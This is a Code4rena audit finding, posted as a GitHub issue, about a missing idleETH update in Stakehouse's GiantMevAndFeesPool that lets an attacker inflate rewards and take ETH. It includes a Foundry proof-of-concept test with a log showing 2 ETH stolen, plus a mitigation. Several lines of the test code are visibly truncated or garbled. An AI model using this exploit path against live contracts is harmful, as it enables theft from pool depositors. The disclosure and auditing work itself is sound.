code-423n4 / 2022-11-stakehouse-findings

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GiantMevAndFeesPool.bringUnusedETHBackIntoGiantPool function loses the addition of the idleETH which allows attackers to steal most of eth from the Giant Pool #173

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


The contract GiantMevAndFeesPool override the function totalRewardsReceived:

return address(this).balance + totalClaimed - idleETH;

The function totalRewardsReceived is used as the current rewards balance to caculate the unprocessed rewards in the function SyndicateRewardsProcessor._updateAccumulatedETHPerLP

uint256 received = totalRewardsReceived();
uint256 unprocessed = received - totalETHSeen;

The idleETH will be decreased in the function batchDepositETHForStaking for sending eth to the staking pool. But the idleETH wont be increased in the function bringUnusedETHBackIntoGiantPool which is used to burn lp tokens in the staking pool, and the staking pool will send the eth back to the giant pool. And then because of the diminution of the idleETH, the accumulatedETHPerLPShare is added out of thin air. So the attacker can steal more eth from the GiantMevAndFeesPool.

Proof of Concept

test: test/foundry/TakeFromGiantPools.t.sol

pragma solidity ^0.8.13;

// SPDX-License-Identifier: MIT

import "forge-std/console.sol";
import {GiantPoolTests} from "./GiantPools.t.sol";
import { LPToken } from "../../contracts/liquid-staking/LPToken.sol";

contract TakeFromGiantPools is GiantPoolTests {
    function testDWclaimRewards() public{
        address nodeRunner = accountOne;, 12 ether);
        address feesAndMevUserOne = accountTwo;, 4 ether);
        address feesAndMevUserTwo = accountThree;, 4 ether);

        // Register BLS key
        registerSingleBLSPubKey(nodeRunner, blsPubKeyOne, accountFour);

        // Deposit ETH into giant fees and mev
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);
        giantFeesAndMevPool.depositETH{value: 4 ether}(4 ether);

        bytes[][] memory blsKeysForVaults = new bytes[][](1);
        blsKeysForVaults[0] = getBytesArrayFromBytes(blsPubKeyOne);

        uint256[][] memory stakeAmountsForVaults = new uint256[][](1);
        stakeAmountsForVaults[0] = getUint256ArrayFromValues(4 ether);
            getUint256ArrayFromValues(4 ether),
        vm.warp(block.timestamp+31 minutes);
        LPToken[] memory tokens = new LPToken[](1);
        tokens[0] = manager.stakingFundsVault().lpTokenForKnot(blsPubKeyOne);

        LPToken[][] memory allTokens = new LPToken[][](1);
        allTokens[0] = tokens;
        // inject a NOOP to skip some functions
        address[] memory stakingFundsVaults = new address[](1);
        bytes memory code = new bytes(1);
        code[0] = 0x00;
        vm.etch(address(0x123), code);
        stakingFundsVaults[0] = address(0x123);
        giantFeesAndMevPool.claimRewards(feesAndMevUserTwo, stakingFundsVaults, blsKeysForVaults);
        console.log("user one:", getBalance(feesAndMevUserOne));
        console.log("user two(attacker):", getBalance(feesAndMevUserTwo));
        console.log("giantFeesAndMevPool:", getBalance(address(giantFeesAndMevPool)));

    function getBalance(address addr) internal returns (uint){
        // giant LP : eth at ratio of 1:1
        return addr.balance + giantFeesAndMevPool.lpTokenETH().balanceOf(addr);


run test:

forge test --match-test testDWclaimRewards -vvv

test log:

  user one: 4000000000000000000
  user two(attacker): 6000000000000000000
  giantFeesAndMevPool: 6000000000000000000

The attacker stole 2 eth from the pool.

Tools Used


Recommended Mitigation Steps


idleETH += _amounts[i];

before burnLPTokensForETH in the GiantMevAndFeesPool.bringUnusedETHBackIntoGiantPool function.

c4-judge commented 1 year ago

dmvt marked the issue as duplicate of #140

c4-judge commented 1 year ago

dmvt marked the issue as not a duplicate

c4-judge commented 1 year ago

dmvt marked the issue as duplicate of #141

c4-judge commented 1 year ago

dmvt marked the issue as selected for report

c4-sponsor commented 1 year ago

vince0656 marked the issue as sponsor confirmed

c4-judge commented 1 year ago

dmvt marked the issue as satisfactory

c4-judge commented 1 year ago

dmvt marked the issue as not a duplicate

c4-judge commented 1 year ago

dmvt marked the issue as primary issue